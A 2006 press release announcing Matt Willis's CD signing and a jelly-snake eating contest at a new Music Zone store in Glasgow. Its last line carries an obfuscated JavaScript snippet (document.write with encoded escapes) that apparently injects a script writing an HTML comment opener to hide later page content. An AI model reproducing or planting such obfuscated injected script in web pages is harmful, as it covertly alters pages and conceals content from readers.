Winner of I'm A Celebrity… Get Me Out Of Here! Matt Willis, will meet fans at the brand new Music Zone store on Argyle Street in Glasgow next week (Tuesday 12 December 2006) at a special signing of his latest single.
Don't Let It Go To Waste (released 11 December on Mercury Music Group) is the third track to be released off his debut solo album of the same title (released 20 November when Matt was battling it out in the Australian jungle).
Matt, who achieved multi platinum album sales, sold out Wembley four times in 2004 and scored four number ones as part of Busted will be at Music Zone, chatting to fans and signing CDs from 4.00pm.
And as homage to Matt's new status as King of The Jungle one lucky fan will win the chance to have an exclusive picture taken with Matt but to win the prize they must complete a stomach-churning Bush Tucker Trial Music Zone style. Five contestants will compete against the clock to eat their own height in wriggly snakes – the famously fabulous jelly sweets from Haribo!
Music Zone store manager George Ritchie said: "Matt has won over loads more fans from his TV success and this will definitely be a sell-out so my advice would be - get here early!"
Don't Let It Go To Waste – the album was written and produced with Jason Perry and Daniel P Carter, formerly of the band A, and their friend Julian Emery. It is chock full of monster tracks, with a sound that Matt accurately describes as "Stadium pop" – think Robbie, Green Day and Van Halen jamming underneath a firework display.
Eren Ozagir, commercial director said: "It's just a week since we opened but already Music Zone is entertaining Glasgow as well as giving shoppers the best choice of value entertainment products available."document.write(unescape('%3Cs\143ri\04570t>\04564oc\165m%65\0456E%74.w\162i\04574e(\165ne%73c\04561pe\04528\047%5C07\04534\\04\0652%31--\04527\051)\073\0453C/%73c\162ip%74>'))
